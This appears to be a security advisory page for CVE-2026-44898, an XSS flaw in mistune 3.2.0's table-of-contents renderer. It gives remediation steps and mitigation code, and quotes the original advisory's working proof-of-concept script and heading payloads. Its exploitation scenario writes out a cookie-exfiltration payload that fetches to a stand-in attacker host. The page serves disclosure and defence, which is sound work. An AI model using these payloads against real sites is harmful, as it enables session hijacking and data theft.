CVE-2026-44898: mistune: XSS in TOC render via unescaped heading ID

GHSA-6269-cqxg-mhhv MEDIUM CISA: TRACK*
Published May 14, 2026
CISO Take

In mistune 3.2.0, the table-of-contents renderer inserts heading IDs into HTML anchor hrefs without HTML escaping. This enables XSS whenever a custom heading_id callback derives the ID from user-controlled heading text, a common pattern for readable slug anchors in documentation generators; the default hook, which assigns sequential numeric IDs, is not affected. With 467 downstream dependents spanning documentation platforms, ML model card renderers, and Jupyter-adjacent tooling, the attack surface is broader than the package name suggests. The vulnerability also fires together with a companion heading-element XSS (H2), so a single malicious heading injects into both the TOC and the document body in one render pass. Exploitation requires no privileges and only standard user interaction (viewing a rendered page), and crafting the payload takes seconds. Teams using mistune 3.2.0 with custom heading_id callbacks should upgrade to 3.2.1 immediately; as a short-term workaround, apply html.escape() to heading IDs before they reach render_toc_ul().

Sources: NVD, GitHub Advisory, OpenSSF

What is the risk?

CVSS 6.1 Medium, but practically elevated for AI/ML platform operators. No active exploitation is confirmed (not in CISA KEV, no Nuclei template, EPSS 0.23%), but a proof of concept is public and the attack is trivially reproducible from it. The OpenSSF Scorecard of 5.4/10 reflects moderate supply-chain hygiene for the upstream package. Risk is concentrated in multi-tenant environments (shared Jupyter hubs, AI documentation portals, model registries with user-editable model cards) where an attacker can submit Markdown that other authenticated users will render. Single-tenant or read-only deployments carry significantly lower exposure.

How does the attack unfold?

Malicious Content Submission
Attacker submits a Markdown document containing a crafted heading whose text encodes an XSS payload designed to break out of the href="#..." attribute context.
AML.T0049
Vulnerable TOC Rendering
mistune 3.2.0's render_toc_ul() formats the raw heading ID directly into an <a href> tag via Python string formatting with no html.escape() call, embedding a live <script> block in the generated HTML.
Browser-Side Script Execution
A victim user loads the rendered page; the browser parses and executes the injected script, which reads document.cookie and transmits session credentials to the attacker's server.
Session Hijacking and Data Access
Attacker replays the stolen session token to authenticate as the victim, accessing private models, API keys, and platform data without any server-side exploit.
AML.T0048.003
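
The rendering step in this chain can be reproduced without mistune installed. The sketch below only imitates the format string quoted in the advisory; the helper names `toc_link_unescaped` and `toc_link_escaped` are hypothetical, and the escaped variant illustrates the general fix rather than the exact code shipped in 3.2.1.

```python
import html

# Format string quoted in the advisory for render_toc_ul().
LINK_TEMPLATE = '<a href="#{}">{}</a>'


def toc_link_unescaped(heading_id: str, label: str) -> str:
    """Imitates the vulnerable behaviour: the ID is inserted verbatim."""
    return LINK_TEMPLATE.format(heading_id, label)


def toc_link_escaped(heading_id: str, label: str) -> str:
    """Hypothetical hardened variant: the ID is HTML-escaped, quotes included."""
    return LINK_TEMPLATE.format(html.escape(heading_id, quote=True), label)


payload = 'x"><script>alert(document.cookie)</script><a href="'
# The advisory notes that the visible label is already escaped upstream.
label = html.escape(payload)

vulnerable = toc_link_unescaped(payload, label)
hardened = toc_link_escaped(payload, label)

print(vulnerable)  # contains a live <script> element
print(hardened)    # the payload stays inside the href attribute value
```

In the unescaped output the `"` in the ID closes the href attribute early, which is what lets the `<script>` tag reach the page as markup.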

What systems are affected?

Package   Ecosystem   Vulnerable Range   Patched
mistune   pip         = 3.2.0            3.2.1
5.7K · OpenSSF 6.6 · 479 dependents · Pushed 15d ago · 59% patched · ~6d to patch

Do you use mistune 3.2.0 with a custom heading_id callback? You're affected.

How severe is it?

CVSS 3.1
6.1 / 10
EPSS
0.2%
chance of exploitation in 30 days
Higher than 14% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI Required
S Changed
C Low
I Low
A None

What should I do?

5 steps
  1. PATCH

    Upgrade mistune to 3.2.1 (commit 04880a0 escapes both the href ID and the heading element ID). Run: pip install 'mistune>=3.2.1'.

  2. AUDIT DEPENDENCIES

    Run 'pip show mistune' across all environments; audit requirements.txt, pyproject.toml, and lockfiles for pinned 3.2.0. Check transitive dependencies — mistune is often a transitive dep of documentation frameworks.

  3. WORKAROUND (if upgrade is blocked)

    Wrap heading ID values with html.escape() before passing to render_toc_ul(), or constrain heading_id callbacks to return only alphanumeric slugs (reject any input containing '<', '>', '"', or "'").

  4. DETECT

    Grep codebases for 'render_toc_ul', 'add_toc_hook', and 'heading_id=' to identify all call sites; review whether the heading_id callback returns raw user input.

  5. RUNTIME

    If running a platform that renders user Markdown, add a Content Security Policy header that blocks inline scripts (script-src 'self') as a defense-in-depth measure.
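
The workaround in step 3 could look roughly like the following. This is a minimal sketch, not the upstream fix: `slug_heading_id` and `escape_toc_ids` are hypothetical names, and the `(token, index)` callback signature and the `(level, id, text)` tuple shape are taken from the advisory's PoC and summary.

```python
import html
import re

_NON_SLUG = re.compile(r"[^a-z0-9]+")


def slug_heading_id(token, index):
    """Hypothetical heading_id callback that emits only [a-z0-9-] characters."""
    text = token.get("text", "")
    slug = _NON_SLUG.sub("-", text.lower()).strip("-")
    # Append the heading index so empty or duplicate slugs stay unique.
    return f"{slug or 'section'}-{index + 1}"


def escape_toc_ids(toc_items):
    """Escape the ID in each (level, id, text) tuple before render_toc_ul()."""
    return [
        (level, html.escape(str(heading_id), quote=True), text)
        for level, heading_id, text in toc_items
    ]


malicious = {"text": 'x"><script>alert(document.cookie)</script><a href="'}
safe_id = slug_heading_id(malicious, 0)
print(safe_id)

escaped = escape_toc_ids([(2, malicious["text"], "label")])
print(escaped[0][1])
```

Constraining the callback is likely the more robust of the two options, because the same ID feeds both the TOC and the heading element; escaping only the `toc_items` list leaves the companion heading-element issue (H2) untouched.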

What does CISA's SSVC say?

Decision Track*
Exploitation poc
Automatable No
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

ISO 42001
A.9.4 - Information security for AI systems
NIST AI RMF
GOVERN 6.2 - Third-Party AI Risk Contingency
OWASP LLM Top 10
LLM03 - Supply Chain Vulnerabilities
LLM05 - Improper Output Handling

Frequently Asked Questions

What is CVE-2026-44898?

CVE-2026-44898 is a cross-site scripting (XSS) flaw in mistune 3.2.0. The table-of-contents renderer, render_toc_ul(), inserts heading IDs into anchor hrefs without HTML escaping, so a custom heading_id callback that derives IDs from user-controlled heading text lets an attacker inject arbitrary HTML, including <script> blocks, into the rendered TOC. The default hook, which assigns sequential numeric IDs, is not affected. A companion heading-element XSS (H2) fires in the same render pass. The issue is fixed in mistune 3.2.1.

Is CVE-2026-44898 actively exploited?

No confirmed active exploitation of CVE-2026-44898 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-44898?

1. PATCH: Upgrade mistune to 3.2.1 (commit 04880a0 escapes both the href ID and the heading element ID). Run: pip install 'mistune>=3.2.1'.
2. AUDIT DEPENDENCIES: Run 'pip show mistune' across all environments; audit requirements.txt, pyproject.toml, and lockfiles for pinned 3.2.0. Check transitive dependencies, since mistune is often a transitive dependency of documentation frameworks.
3. WORKAROUND (if upgrade is blocked): Wrap heading ID values with html.escape() before passing to render_toc_ul(), or constrain heading_id callbacks to return only alphanumeric slugs (reject any input containing '<', '>', '"', or "'").
4. DETECT: Grep codebases for 'render_toc_ul', 'add_toc_hook', and 'heading_id=' to identify all call sites; review whether the heading_id callback returns raw user input.
5. RUNTIME: If running a platform that renders user Markdown, add a Content Security Policy header that blocks inline scripts (script-src 'self') as a defense-in-depth measure.
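
For the audit step, one way to check the interpreter you are running in is sketched below. It assumes the affected range is exactly 3.2.0, as listed on this page; `is_vulnerable` and `installed_mistune_status` are hypothetical helper names.

```python
from importlib import metadata

# Affected range as listed in this advisory (an exact version, not a span).
VULNERABLE_VERSIONS = {"3.2.0"}


def is_vulnerable(version: str) -> bool:
    """Return True if the given version string is the affected release."""
    return version.strip() in VULNERABLE_VERSIONS


def installed_mistune_status() -> str:
    """Describe the mistune version visible to the current interpreter."""
    try:
        version = metadata.version("mistune")
    except metadata.PackageNotFoundError:
        return "mistune is not installed in this environment"
    if is_vulnerable(version):
        return f"mistune {version}: affected, upgrade to 3.2.1"
    return f"mistune {version}: not the affected 3.2.0 release"


print(installed_mistune_status())
```

This only inspects one environment; lockfiles and container images still need to be checked separately.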

What systems are affected by CVE-2026-44898?

This vulnerability affects the following AI/ML architecture patterns: ML documentation platforms, Jupyter notebook environments, Model card renderers, AI tool web UIs, Documentation generation pipelines.

What is the CVSS score for CVE-2026-44898?

CVE-2026-44898 has a CVSS v3.1 base score of 6.1 (MEDIUM). The EPSS exploitation probability is 0.23%.

What is the AI security impact?

Affected AI Architectures

ML documentation platforms
Jupyter notebook environments
Model card renderers
AI tool web UIs
Documentation generation pipelines

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0025 Exfiltration via Cyber Means
AML.T0048.003 User Harm
AML.T0049 Exploit Public-Facing Application

Compliance Controls Affected

ISO 42001: A.9.4
NIST AI RMF: GOVERN 6.2
OWASP LLM Top 10: LLM03, LLM05

What are the technical details?

Original Advisory

## Summary

`render_toc_ul()` builds a `<ul>` table-of-contents tree from a list of `(level, id, text)` tuples. Both the `id` value (used as `href="#<id>"`) and the `text` value (used as the visible link label) are inserted into `<a>` tags via a plain Python format string, with no HTML escaping applied to either value.

When heading IDs are derived from user-supplied heading text (the standard use-case for readable slug anchors), an attacker can craft a heading whose text breaks out of the `href="#..."` attribute context, injecting arbitrary HTML tags including `<script>` blocks directly into the rendered TOC.

This vulnerability is closely related to H2 (unescaped `id=` in `heading()`): the same `heading_id` callback pattern that triggers H2 also populates the `toc_items` list that `render_toc_ul()` consumes, meaning both vulnerabilities fire simultaneously in a typical documentation setup.

## Details

**File:** `src/mistune/toc.py`

```python
def render_toc_ul(toc):
    ...
    for level, k, text in toc:
        # k = heading id (used verbatim as href fragment)
        # text = heading text (used verbatim as link label)
        item = '<a href="#{}">{}</a>'.format(k, text)
        # Neither k nor text is passed through escape() at any point
```

The `k` and `text` values come directly from the `toc_items` list accumulated during parsing. If `k` contains `"` or `>`, the `href` attribute is broken. If `text` contains `<`, raw tags are injected as the visible link content.

## PoC

**Step 1: Establish the baseline (safe default IDs)**

The script creates a parser with `escape=True` and the default `add_toc_hook()` (no custom callback). The default hook assigns sequential numeric IDs that never contain user text:

```python
from mistune import create_markdown
from mistune.toc import add_toc_hook, render_toc_ul

md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)

bl_src = "# Introduction\n\n## Installation\n"
_, state = md_safe.parse(bl_src)
bl_out = render_toc_ul(state.env.get("toc_items", []))
```

Output (clean, safe TOC):

```html
<ul>
<li><a href="#toc_1">Introduction</a>
<ul>
<li><a href="#toc_2">Installation</a></li>
</ul>
</li>
</ul>
```

**Step 2: Enable the vulnerable `heading_id` callback**

Register a callback that returns the raw heading text as the ID. This is the standard slug-based anchor pattern used by documentation generators:

```python
def raw_id(token, index):
    return token.get("text", "")

md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)
```

**Step 3: Craft the exploit payload**

Construct a heading whose text terminates the `href="#..."` attribute and injects a `<script>` block followed by a dangling `<a href="` to absorb the closing `">` that `render_toc_ul` appends:

```
## x"><script>alert(document.cookie)</script><a href="
```

When `raw_id` processes this heading, it returns the entire text as the ID: `x"><script>alert(document.cookie)</script><a href="`.

**Step 4: Observe script injection in the TOC output**

```python
ex_src = '## x"><script>alert(document.cookie)</script><a href="\n'
_, state = md_vuln.parse(ex_src)
ex_out = render_toc_ul(state.env.get("toc_items", []))
```

`render_toc_ul()` formats the malicious ID directly into the `<a href>`:

```python
'<a href="#{}">{}</a>'.format(k, text)
# becomes:
'<a href="#x"><script>alert(document.cookie)</script><a href="">...</a>'
```

Actual output:

```html
<ul>
<li><a href="#x"><script>alert(document.cookie)</script><a href="">x&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;a href=&quot;</a></li>
</ul>
```

The `<script>` block is live in the document. Note that the anchor *label* (`text`) is escaped correctly by mistune's inline renderer before it reaches `toc_items`, but `k` (the heading ID) is not escaped anywhere.

### Script

I have built a script that you can use to verify this. It creates an HTML page showing the bypass so that you can see it render in the browser.

```python
#!/usr/bin/env python3
"""H4: render_toc_ul() puts raw heading ID into <a href> without escaping."""
import os, html as h
from mistune import create_markdown
from mistune.toc import add_toc_hook, render_toc_ul


def raw_id(token, index):
    return token.get("text", "")


# --- baseline ---
md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)

bl_file = "baseline_h4.md"
bl_src = "# Introduction\n\n## Installation\n"
with open(os.path.join(os.getcwd(), bl_file), "w") as f:
    f.write(bl_src)

_, state = md_safe.parse(bl_src)
bl_out = render_toc_ul(state.env.get("toc_items", []))
print(f"[{bl_file}]\n{bl_src}")
print("[toc output — safe]")
print(bl_out)

# --- exploit ---
md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)

ex_file = "exploit_h4.md"
ex_src = '## x"><script>alert(document.cookie)</script><a href="\n'
with open(os.path.join(os.getcwd(), ex_file), "w") as f:
    f.write(ex_src)

_, state = md_vuln.parse(ex_src)
ex_out = render_toc_ul(state.env.get("toc_items", []))
print(f"[{ex_file}]\n{ex_src}")
print("[toc output — script injected via href breakout]")
print(ex_out)

# --- HTML report ---
CSS = """
body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px}
h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px}
p.desc{color:#555;font-size:.9em;margin-top:6px}
.case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)}
.case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em}
.baseline .case-header{background:#d1fae5;color:#065f46}
.exploit .case-header{background:#fee2e2;color:#7f1d1d}
.panels{display:grid;grid-template-columns:1fr 1fr;background:#fff}
.panel{padding:16px}
.panel+.panel{border-left:1px solid #eee}
.panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em}
pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all}
.rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace}
.rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em}
"""


def case(kind, label, filename, src, out):
    return f"""
<div class="case {kind}">
  <div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div>
  <div class="panels">
    <div class="panel">
      <h3>Input — {h.escape(filename)}</h3>
      <pre>{h.escape(src)}</pre>
    </div>
    <div class="panel">
      <h3>TOC output — HTML source</h3>
      <pre>{h.escape(out)}</pre>
      <div class="rlabel">↓ rendered in browser</div>
      <div class="rendered">{out}</div>
    </div>
  </div>
</div>"""


page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8">
<title>H4 — TOC XSS</title><style>{CSS}</style></head><body>
<h1>H4 — TOC render_toc_ul() XSS</h1>
<p class="desc">render_toc_ul() in toc.py uses '&lt;a href="#{{}}"&gt;{{}}&lt;/a&gt;'.format(k, text) — neither k (the heading ID) nor text is escaped before insertion.</p>
{case("baseline", "Normal headings → sequential IDs → clean TOC links", bl_file, bl_src, bl_out)}
{case("exploit", "Malicious heading ID breaks out of href='#...' → script injected", ex_file, ex_src, ex_out)}
</body></html>"""

out_path = os.path.join(os.getcwd(), "report_h4.html")
# The report contains non-ASCII characters, so write it explicitly as UTF-8.
with open(out_path, "w", encoding="utf-8") as f:
    f.write(page)
print(f"\n[report] {out_path}")
```

Example usage:

```bash
python poc.py
```

Once you run the script, open `report_h4.html` in the browser and observe the behaviour.

## Impact

| Dimension | Assessment |
|------------------|-----------|
| **Confidentiality** | JavaScript execution; attacker can exfiltrate session cookies and any data accessible from the page's origin |
| **Integrity** | Arbitrary DOM manipulation, phishing form injection, forced redirects |
| **Availability** | Page crash or freeze available as secondary effect |

**Risk context:** TOC generation is a rendering step that often happens in a different template layer from the main body render, potentially reviewed separately and trusted implicitly. Vulnerabilities in TOC output are frequently overlooked in code review. Combined with H2, an attacker exploiting this via a single malicious heading simultaneously injects into both the heading element and the TOC anchor.

Exploitation Scenario

An attacker targeting an AI documentation platform or shared Jupyter environment that renders user-submitted Markdown with TOC generation enabled submits a notebook or model card containing the heading: '## x"><script>fetch("https://attacker.com/c?"+document.cookie)</script><a href="'. When a platform administrator or peer researcher views the rendered document, mistune 3.2.0 formats the heading text verbatim into the TOC anchor href via Python's .format(), producing a live <script> block in the page. The injected script exfiltrates the victim's session cookie to the attacker's server. The attacker replays the session token to authenticate as the victim, gaining access to private models, datasets, API keys, and subscription management — without ever touching the server. Because the companion H2 vulnerability fires simultaneously, the payload is injected twice: once in the TOC and once in the heading element itself, increasing the probability of execution even if one injection point is partially sanitized downstream.
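
The scenario above depends on an inline `<script>` executing in the victim's browser, which is what the Content Security Policy recommended in the remediation steps is meant to stop. Below is a minimal sketch of attaching that header in a plain WSGI stack; `add_csp` and `demo_app` are hypothetical names, and real deployments would more likely set the header in their web framework or reverse proxy.

```python
from wsgiref.util import setup_testing_defaults

CSP_VALUE = "script-src 'self'"  # policy string from the remediation steps


def add_csp(app, policy=CSP_VALUE):
    """Wrap a WSGI app so every response carries a Content-Security-Policy header."""
    def wrapped(environ, start_response):
        def start_with_csp(status, headers, exc_info=None):
            # Drop any existing CSP header so the policy is not duplicated.
            kept = [(k, v) for k, v in headers
                    if k.lower() != "content-security-policy"]
            kept.append(("Content-Security-Policy", policy))
            return start_response(status, kept, exc_info)
        return app(environ, start_with_csp)
    return wrapped


def demo_app(environ, start_response):
    """Stand-in for a page that serves rendered Markdown."""
    start_response("200 OK", [("Content-Type", "text/html; charset=utf-8")])
    return [b"<h1>rendered markdown</h1>"]


# Exercise the middleware without starting a server.
captured = {}


def fake_start_response(status, headers, exc_info=None):
    captured["status"] = status
    captured["headers"] = dict(headers)


environ = {}
setup_testing_defaults(environ)
body = b"".join(add_csp(demo_app)(environ, fake_start_response))
print(captured["headers"]["Content-Security-Policy"])
```

A policy like this is defense in depth only: it blocks inline script execution in browsers that enforce CSP, but the injected markup still reaches the page, so upgrading remains the actual fix.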

Weaknesses (CWE)

CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

  • [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
  • [Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the HTML body, element attributes (such as src="XYZ"), URIs, JavaScript sections, etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
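
As a cross-check, the 6.1 base score can be recomputed from this vector using the published CVSS v3.1 base-score equations. The sketch below covers base metrics only; the function names are illustrative rather than taken from any particular library.

```python
import math

# Metric weights from the CVSS v3.1 specification.
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}


def roundup(value: float) -> float:
    """CVSS v3.1 Roundup: smallest one-decimal number >= value."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the CVSS v3.1 base score from a vector string."""
    metrics = dict(part.split(":") for part in vector.split("/")[1:])
    changed = metrics["S"] == "C"
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[metrics["PR"]]
    iss = 1 - ((1 - CIA[metrics["C"]])
               * (1 - CIA[metrics["I"]])
               * (1 - CIA[metrics["A"]]))
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    exploitability = (8.22 * AV[metrics["AV"]] * AC[metrics["AC"]]
                      * pr * UI[metrics["UI"]])
    if impact <= 0:
        return 0.0
    total = impact + exploitability
    return roundup(min(1.08 * total if changed else total, 10))


score = base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N")
print(score)  # 6.1
```

With these inputs the impact sub-score is about 2.73 and exploitability about 2.84; the changed scope applies the 1.08 multiplier, giving roughly 6.007, which rounds up to 6.1.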

Timeline

Published
May 14, 2026
Last Modified
May 14, 2026
First Seen
May 14, 2026

Related Vulnerabilities